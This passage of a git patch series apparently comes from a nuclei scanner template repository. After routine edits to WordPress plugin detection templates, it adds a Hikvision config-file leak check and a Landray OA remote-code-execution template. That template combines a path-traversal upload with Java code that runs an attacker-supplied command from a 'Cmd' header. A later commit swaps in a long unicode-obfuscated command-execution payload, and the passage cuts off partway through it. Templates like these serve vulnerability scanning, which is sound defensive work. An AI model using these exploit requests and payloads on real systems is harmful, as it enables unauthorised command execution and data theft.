4a0a004730450220551cf6c0ccfbfa5019eae56d68c8036b80b7810b69f51780f5c32b29f49f2bf50221009cf4013998ed5f22229bb0f7120dda5e6c25f50415b022932324d01776eee998:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 59f2fa9293..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002b718e62bfd7fedd6e73a0db2f507a66c012dcf489de800bb8ec7684c682c9302210083a5912b0fe7a0e5ad76e4b433e17e143ab9bbd94b77b283da774b5a946daada:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 41c46271ae..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220349dd808c6d94c48bd924a9b535da36634c8dcdad903f31294aabc987449001d02207ecaba494c9956e678eddd38e356e3a5042469ed61c9b482a5be954d81e7ecea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 8b94ec9705..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bb11e4819198956f27f8ab1bd725f27dcb237fa01a395bdac5a8f62fb9d9faa9022100c83012d6095c12be995dd31c89b58f0be21a94d23a897a18a5ac333389a34a6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 3199f4f0f4..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210083a913042a45112d1b91c08b8fc558d4179d5b8eb1cb50cf852649295cf462cc022058c39db1b55c39b643ca523dab4756708dccfae5146e51e0e3d8fd7846b37802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 9477f590af..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f5dd9cab4e9465d25b5b25ac4f6df79e500f56b521149f86a26290f2a5883d3302202b993548be934162ef41b9dab07053e7e6b9843486aae5c9f7fe99a931d07096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index d50421162f..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050663b4ebaf63da03fc096ac7b8b70ad025a0e085c9f72a7bd1c15ac3f3fc82a0220056f39fd178306ee7dd3a66498b5bd0a1d8f1529b0b3604a92cbe9c9de2f5d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 051451c386cb3c7001387c80589c92b8a1b2a9ea Mon Sep 17 00:00:00 2001 From: r00t <24542600+adeljck@users.noreply.github.com> Date: Wed, 24 Jul 2024 12:04:26 +0800 Subject: [PATCH 1577/1841] Add hikvision-iSecure-info-leak.yaml --- .../hikvision-iSecure-info-leak.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml diff --git a/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml b/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml new file mode 100644 index 0000000000..aadd8d4415 --- /dev/null +++ b/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml @@ -0,0 +1,33 @@ +id: hikvision-iSecure-info-leak + +info: + name: zongheanfang-info-leak + author: adeljck + severity: critical + description: | + Hikvision iSecure Center /portal/conf/config.properties can get encrypted redis password,if server expose redis port.people can get a reverse shell with redis. + reference: + - https://github.com/adeljck/Hikvision_Info_Leak + metadata: + verified: true + max-request: 2 + fofa-query: icon_hash="-808437027",app="HIKVISION-综合安防管理平台",title="综合安防管理平台",body="/portal/skin/ifar/blue/skin.css" + tags: infoleak,iot,hikvision +http: + - method: GET + path: + - "{{BaseURL}}/portal/conf/config.properties" + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + Accept-Encoding: gzip, deflate + Sec-Fetch-Dest: empty + Sec-Fetch-Mode: cors + Sec-Fetch-Site: same-origin + Te: trailers + Connection: close + + matchers: + - type: word + words: + - 'password' \ No newline at end of file From d1c04fb7c4d8a5071cd59113c2ac18ad25214102 Mon Sep 17 00:00:00 2001 From: r00t <24542600+adeljck@users.noreply.github.com> Date: Wed, 24 Jul 2024 12:07:00 +0800 Subject: [PATCH 1578/1841] Add landray-oa-replaceExtend-rce.yaml --- .../landray/landray-oa-replaceExtend-rce.yaml | 67 +++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 http/vulnerabilities/landray/landray-oa-replaceExtend-rce.yaml diff --git a/http/vulnerabilities/landray/landray-oa-replaceExtend-rce.yaml b/http/vulnerabilities/landray/landray-oa-replaceExtend-rce.yaml new file mode 100644 index 0000000000..a5796d6d1a --- /dev/null +++ b/http/vulnerabilities/landray/landray-oa-replaceExtend-rce.yaml @@ -0,0 +1,67 @@ +id: landray-oa-replaceExtend-rce + +info: + name: Landray OA replaceExtend Function - Remote Code Execution + author: adeljck + severity: critical + description: | + There is a remote command execution vulnerability in Lanling OA replaceExtend Method. Use This Method To Move dataxml.jsp To A Dirctory That Can Access Without Auth,Then An attacker can Run Command With this. + reference: + - https://forum.ywhack.com/thread-203681-1-1.html + metadata: + verified: true + max-request: 1 + fofa-query: app="Landray-OA系统" + hunter-query: web.body=="蓝凌软件",web.icon=="302464c3f6207d57240649926cfc7bd4" + tags: landray,oa,dataxml,rce,replaceExtend + +http: + - raw: + - | + POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 + Content-Length: 400 + Accept: application/json, text/javascript, */*; q=0.01 + Accept-Encoding: gzip, deflate + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51 + X-Requested-With: XMLHttpRequest + Connection: close + + ------WebKitFormBoundaryL7ILSpOdIhIIvL51 + Content-Disposition: form-data; name="method" + + replaceExtend + ------WebKitFormBoundaryL7ILSpOdIhIIvL51 + Content-Disposition: form-data; name="extendId" + + ../../../../resource/help/sys/portal/ + ------WebKitFormBoundaryL7ILSpOdIhIIvL51 + Content-Disposition: form-data; name="folderName" + + ../../../ekp/sys/common + ------WebKitFormBoundaryL7ILSpOdIhIIvL51-- + - | + POST /resource/help/sys/portal/dataxml.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 + Content-Length: 17392 + Cmd: echo 4de0353d63cc9ab4286361a4ff3f12d1 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + Cookie: SESSION=NWNjYWI3YmUtZTM2Ny00MzY2LTgwN2QtYTdiMzdlOGRlMTg5; Path=/; HttpOnly; SameSite=Lax + Connection: close + + s_bean=ruleFormulaValidate&script=try {String cmd = request.getHeader("Cmd");Process child = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "4de0353d63cc9ab4286361a4ff3f12d1" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From f95a070b61418e539c0a0a37dd045faab7b2c101 Mon Sep 17 00:00:00 2001 From: r00t <24542600+adeljck@users.noreply.github.com> Date: Wed, 24 Jul 2024 14:44:56 +0800 Subject: [PATCH 1579/1841] Update landray-oa-replaceExtend-rce.yaml --- http/vulnerabilities/landray/landray-oa-replaceExtend-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/landray/landray-oa-replaceExtend-rce.yaml b/http/vulnerabilities/landray/landray-oa-replaceExtend-rce.yaml index a5796d6d1a..5cf491ecba 100644 --- a/http/vulnerabilities/landray/landray-oa-replaceExtend-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-replaceExtend-rce.yaml @@ -52,7 +52,7 @@ http: Cookie: SESSION=NWNjYWI3YmUtZTM2Ny00MzY2LTgwN2QtYTdiMzdlOGRlMTg5; Path=/; HttpOnly; SameSite=Lax Connection: close - s_bean=ruleFormulaValidate&script=try {String cmd = request.getHeader("Cmd");Process child = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);} + s_bean=ruleFormulaValidate&script=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0043\u006d\u0064\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f